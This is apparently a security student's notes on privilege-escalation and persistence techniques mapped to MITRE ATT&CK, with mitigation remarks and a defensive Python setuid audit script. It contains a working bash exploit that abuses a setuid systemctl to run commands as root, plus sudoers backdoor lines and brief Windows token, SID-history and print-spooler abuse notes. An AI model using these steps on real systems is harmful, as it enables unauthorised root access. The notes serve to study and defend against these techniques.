## Elevation Control Mechanism Abuse
### Linux & macOS
#### setuid and setgid
Platforms: macOS, Linux. MITRE: https://attack.mitre.org/techniques/T1548/001/
`setuid` or `setgid` bits set in UNIX. `chmod u+s [file]` or `chmod 4777 [file]` to set the bit. To enable the setgid bit, `chmod 2775` and `chmod g+s` can be used. Look for the files with the bit set: `find / -perm -4000 2>/dev/null` for setuid and `find / -perm -2000 2>/dev/null` for setgid (BSD/macOS `find` and older GNU `find` also accept the `+4000` spelling).
When a user runs an executable file with the setuid bit set, the real user ID (RUID) of the process is set to the user ID of the user who ran the file, while the effective user ID (EUID) is set to the user ID of the file owner. This means that the process runs with the privileges of the file owner while still retaining the identity of the user who executed the file.
One of the files with this bit set is `systemctl`. This process is used to start services, for example, an Apache server: `sudo systemctl start apache2`. However, if this file is assigned SUID permissions by mistake, it can be used for privilege escalation.
```bash
eop=$(mktemp).service  # create a temp file with a random unique name and store the name in the eop variable
# Write the unit file; systemctl will run the process specified in ExecStart.
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > "$eop"
# ❗️ I have added touch $eop but it's not required (it was in my case, cause I had an error)
/bin/systemctl link "$eop"          # symlinks the unit file into /etc/systemd/system/ so the service can be managed with systemctl
/bin/systemctl enable --now "$eop"  # "enable" makes the service start at boot; "--now" starts it immediately
```
Below is the list generated by ChatGPT (to validate) that shows other executables with this bit set that are potentially useful to the attacker:
- `/usr/bin/passwd`: Used to change user passwords. A vulnerability in this file could allow an attacker to gain root privileges.
- `/usr/bin/chsh`: Used to change a user's default shell. A vulnerability in this file could allow an attacker to gain root privileges.
- `/usr/bin/chfn`: Used to change a user's finger information. A vulnerability in this file could allow an attacker to gain root privileges.
- `/usr/bin/sudo`: Used to run commands as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.
- `/usr/bin/sudoedit`: Used to edit files as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.
Mitigation: Don't set this bit on binaries with known shell escape vulnerabilities.
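An added audit script (not from the writeups linked below) that does what the `find / -perm -4000` one-liner does and then separates the expected setuid binaries from the list above from unexpected ones such as a `systemctl` that was given the bit by mistake; the directory tree it walks in the demo is constructed in a temporary directory.

```python
"""Audit a directory tree for setuid/setgid files and compare against an allowlist.

Added example, not from the writeups linked on the page. It does in Python what
`find / -perm -4000` does, then separates expected binaries (the list above) from
unexpected ones such as a systemctl that was given the bit by mistake. The tree
it walks in the demo is constructed in a temporary directory.
"""
import os
import stat
import tempfile

# Binaries that are setuid by design on most distributions (from the list above).
EXPECTED_SETUID = {"passwd", "chsh", "chfn", "sudo", "sudoedit"}

def find_set_id_files(root):
    """Return sorted [(path, 'setuid'|'setgid'|'setuid+setgid')] under root.

    Symlinks are not followed and unreadable entries are skipped, mirroring
    the `2>/dev/null` on the find one-liner.
    """
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = []
            if st.st_mode & stat.S_ISUID:
                bits.append("setuid")
            if st.st_mode & stat.S_ISGID:
                bits.append("setgid")
            if bits:
                found.append((path, "+".join(bits)))
    return sorted(found)

def unexpected(found, expected_names=EXPECTED_SETUID):
    """Keep only set-id files whose basename is not on the allowlist."""
    return [(p, b) for p, b in found if os.path.basename(p) not in expected_names]

def build_demo_tree():
    """Construct a throwaway tree: allowed setuid passwd, setgid wall, rogue setuid systemctl."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    layout = {
        "usr/bin/passwd": 0o4755,     # expected
        "usr/bin/wall": 0o2755,       # setgid, not on the setuid allowlist
        "bin/systemctl": 0o4755,      # the misconfiguration discussed above
        "usr/bin/ls": 0o755,          # ordinary binary, must not be reported
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\n")  # placeholder content, never executed
        os.chmod(path, mode)
    return root

if __name__ == "__main__":
    root = build_demo_tree()
    hits = find_set_id_files(root)
    for path, bits in unexpected(hits):
        print(f"{bits:<14} {os.path.relpath(path, root)}")
```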
#### Sudo caching
Platforms: macOS, Linux. MITRE: https://attack.mitre.org/techniques/T1548/003/
One can add `admin ALL=(ALL) NOPASSWD: ALL` to the `/etc/sudoers` file.
Also, malware might monitor the `/var/db/sudo` timestamp file and execute when possible.
Also, it's possible to disable terminal window isolation, like this: `echo 'Defaults !tty_tickets' >> /etc/sudoers`.
#### AuthorizationExecuteWithPrivileges
Platforms: macOS. MITRE: https://attack.mitre.org/techniques/T1548/004/
`AuthorizationExecuteWithPrivileges` API (macOS). Set the preferences to block all programs not downloaded from the App Store. Basically, it brings up a prompt and asks the user to grant the permissions. The trick is to be convincing enough so that the user grants the permissions.
Mitigations: least privilege, proper configuration, defense in depth, zero trust.
Writeups 📚:
- https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
- https://n0w4n.nl/vulnversity/
### Windows
#### UAC Abuse
Platforms: Windows. MITRE: https://attack.mitre.org/techniques/T1548/002/
Abusing UAC on Windows.
#### Tokens
MITRE: https://attack.mitre.org/techniques/T1134/001/, https://attack.mitre.org/techniques/T1134/, https://attack.mitre.org/techniques/T1134/002/, https://attack.mitre.org/techniques/T1134/003/, https://attack.mitre.org/techniques/T1134/004/, https://attack.mitre.org/techniques/T1134/005/. Actors: https://attack.mitre.org/groups/G0032/
Techniques:
- Token impersonation: `runas` or `CreateProcessWithTokenW` to create a process with the rights of another user.
- Spoof parent process ID.
- Windows SID-history injection. By injecting a fake SID into the SID history of a user account, an attacker can create a new identity with additional access rights without raising any alarms. 🚨 Needs elevated privileges. The SID history is stored in the user object's attribute in the AD database. The attribute is named "SIDHistory" and can be viewed and modified using the Active Directory Users and Computers (ADUC) management console or other AD management tools.
## Kernel Modules and Extensions
### Linux
#### LKM
LKM for Linux. Drivers are one type of kernel extension.
#### XDG
https://attack.mitre.org/techniques/T1547/013/
### macOS
#### kext
`kext` for macOS: `kextload` and `kextunload`. These need to be signed with a cert approved by Apple. Otherwise, to launch the app one needs to disable SIP. That's probably the reason why the RAM cannot be dumped on macOS with SIP enabled. Replaced by System Extensions but still can be used.
#### reopen
Remember the "Reopen windows when logging back in" prompt on macOS? When selected, all applications currently open are added to a property list file named `com.apple.loginwindow.[UUID].plist` within the `~/Library/Preferences/ByHost` directory. Applications listed in this file are automatically reopened upon the user's next logon.
### Windows
#### LSASS driver
#### Shortcuts
Abuse shortcuts in the startup folder to execute tools and achieve persistence.
#### Port Monitors
`AddMonitor` API call. `spoolsv.exe` runs under SYSTEM privileges. `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors` (option #2):
- Local Port
- Standard TCP/IP Port
- USB Monitor
- WSD Port
#### Print Processors
Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe` (SYSTEM permissions), during boot. Two ways to register one:
- `AddPrintProcessor` for an account with the `SeLoadDriverPrivilege` flag set.
- Adding the `HKLM\SYSTEM\[CurrentControlSet or ControlSet001]\Control\Print\Environments\[Windows architecture: e.g., Windows x64]\Print Processors\[user defined]\Driver` registry key that points to the DLL.
## References
### macOS
Wardle, Patrick. The Art of Mac Malware
### PEASS
Detect possible PE vectors on a W/L/M machine.